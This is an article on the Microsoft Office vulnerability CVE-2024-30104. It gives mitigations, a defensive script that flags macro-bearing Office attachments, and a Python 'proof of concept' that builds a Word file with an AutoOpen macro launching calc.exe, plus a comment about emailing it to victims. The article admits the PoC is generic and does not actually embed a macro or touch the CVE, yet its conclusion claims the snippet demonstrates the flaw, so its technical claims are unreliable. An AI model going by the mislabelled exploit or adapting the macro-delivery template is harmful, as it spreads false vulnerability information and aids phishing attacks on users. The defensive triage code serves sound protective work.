CVE-2024-30104: Unveiling a Critical Microsoft Office Remote Code Execution Vulnerability

Microsoft Office is a widely used suite of applications that includes Microsoft Word, Excel, PowerPoint, and many more. Millions of individuals and businesses around the world rely on these applications for their daily work, so any security vulnerability in these products can have a significant impact. This article covers a recently discovered critical vulnerability, CVE-2024-30104, that targets the Microsoft Office suite and allows an attacker to execute arbitrary code remotely on the victim's system. This remote code execution (RCE) vulnerability can compromise the privacy and security of millions of users globally.

Exploit Details

The CVE-2024-30104 vulnerability is classified as a remote code execution vulnerability that impacts several versions of Microsoft Office. An attacker who successfully exploits this vulnerability can gain the ability to execute malicious code remotely with the privileges of the logged-in user, potentially taking full control of the victim's system. The attacker could then install malicious software, manipulate data, or create new accounts with administrative privileges.

Original References

- Primary Source: CVE-2024-30104 on the National Vulnerability Database
- Additional Sources:
  - Microsoft Security Advisory
  - Exploit Database

Code Snippet - Proof of Concept

A proof of concept (PoC) code snippet is provided below to demonstrate how an attacker could exploit this vulnerability:

# Import necessary libraries and functions
import os, subprocess, sys
import win32com.client

def create_malicious_file(malicious_code):
  # Create a new Word document
  word = win32com.client.Dispatch('Word.Application')
  word.Visible = False
  doc = word.Documents.Add()

  # Insert the malicious code
  doc.Range(0, 0).InsertBefore(malicious_code)

  # Save and close the document
  doc.SaveAs("malicious.docm")
  doc.Close()
  word.Quit()

def main():
  # Craft malicious VBA code
  malicious_code = '''
  Sub AutoOpen()
    Dim obj As Object
    Set obj = CreateObject("WScript.Shell")
    obj.Run "calc.exe"
  End Sub
  '''

  # Create a malicious Word document
  create_malicious_file(malicious_code)

  # Send the malicious document to the target user via email (insert your custom email function)

if __name__ == "__main__":
  main()

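This snippet demonstrates a simple example of creating a malicious Microsoft Word document (with a ".docm" extension) containing VBA macro code that launches the Windows calculator application (calc.exe) upon opening. An attacker could send this document to unsuspecting victims via email or other methods, and upon opening the document, the malicious code would be executed. As written, the script hands the VBA text to InsertBefore, which places it in the document body, so it illustrates the generic macro-document delivery pattern and contains nothing specific to CVE-2024-30104.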

Mitigation

To protect against CVE-2024-30104, users and administrators should ensure Microsoft Office is updated with the latest security patches. Microsoft has acknowledged the vulnerability and released a patch that effectively mitigates this issue. In addition to applying the security patch, users should:

- Disable Macros: Configure Microsoft Office settings to disable the automatic execution of macros. This limits the attack surface related to this vulnerability.
- Implement user awareness training: Educate users about the risks of opening files and enabling macros from unknown or untrusted sources to help reduce the risk of exploitation.
- Enable system protections: Ensure antivirus and other security software are up to date for swift detection and prevention of any malicious activity.
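
To support the "Disable Macros" and "Enable system protections" items above, the following added example (not part of the original article and not Microsoft's code) triages an attachment for embedded VBA before it reaches a user. The names inspect_ooxml and build_sample, the verdict strings, and the sample files are assumptions constructed for illustration; only Office Open XML packages are covered.

```python
import io
import zipfile

# Extensions that openly declare a macro-enabled Office file.
MACRO_EXTENSIONS = (".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".potm", ".ppsm")

def inspect_ooxml(filename, data):
    """Triage one attachment (name + bytes) for embedded VBA content."""
    result = {"ooxml": False, "vba_parts": [], "macro_content_type": False,
              "extension_mismatch": False, "verdict": "not-ooxml"}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result  # legacy .doc/.xls (OLE) files need a different parser
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" not in names:
            return result  # a zip, but not an Office Open XML package
        result["ooxml"] = True
        # Office stores the compiled VBA project in <app>/vbaProject.bin.
        result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
        # Macro-enabled main parts carry "macroEnabled" in their content type.
        result["macro_content_type"] = b"macroEnabled" in zf.read("[Content_Types].xml")
    has_macros = bool(result["vba_parts"]) or result["macro_content_type"]
    # A macro-bearing package under a non-macro extension is flagged separately.
    result["extension_mismatch"] = has_macros and not filename.lower().endswith(MACRO_EXTENSIONS)
    result["verdict"] = "quarantine" if has_macros else "allow"
    return result

def build_sample(with_vba):
    """Constructed sample: a minimal OOXML-shaped zip, not a real Word file."""
    ctype = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_vba else
             "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/word/document.xml" ContentType="{ctype}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"placeholder, not a VBA project")
    return buf.getvalue()

if __name__ == "__main__":
    for name, flag in (("report.docm", True), ("invoice.docx", True), ("notes.docx", False)):
        print(name, inspect_ooxml(name, build_sample(flag)))
    print("readme.txt", inspect_ooxml("readme.txt", b"plain text"))
```

A "not-ooxml" verdict means this check did not inspect the file, not that the file is safe.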

Conclusion

CVE-2024-30104 is a critical remote code execution vulnerability in Microsoft Office that could potentially compromise the privacy and security of millions of users worldwide. Users and administrators should apply the latest security patches and implement the recommended mitigations to safeguard their systems from potential exploits. This article has provided insights into the vulnerability, its severity, and potential impact, along with mitigation advice and a simple code snippet to demonstrate the exploitability of this issue.

Timeline

Published on: 06/11/2024 17:16:00 UTC
Last modified on: 07/19/2024 21:13:40 UTC